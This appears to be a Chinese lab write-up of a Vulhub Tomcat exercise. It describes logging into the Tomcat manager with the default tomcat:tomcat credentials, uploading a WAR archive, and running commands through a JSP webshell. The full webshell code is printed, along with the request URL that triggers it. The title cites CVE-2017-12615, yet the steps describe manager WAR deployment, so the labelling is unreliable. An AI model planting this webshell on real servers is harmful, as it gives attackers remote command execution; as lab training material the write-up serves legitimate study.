Vulnhub-Tomcat系列漏洞–CVE-2017-12615
漏洞简述
Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。
正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。
准备环境
启动Vulnhub靶机环境:
漏洞复现
打开tomcat管理页面
进入后台http://192.168.94.129:8080/manager/html,输入默认账户及密码tomcat:tomcat
在本机上制作一句话木马,写入cmd.jsp中再讲jsp文件压缩程zip文件,最终修改zip文件尾缀为war,上传即可。
一句话木马文件内容为:
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("pre"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("/pre"); } %>
可以看到已经生成了cmd文件夹,访问木马文件即可远程执行命令:
ip:8080/cmd1/cmd.jsp?pwd=023&i=pwd
漏洞利用成功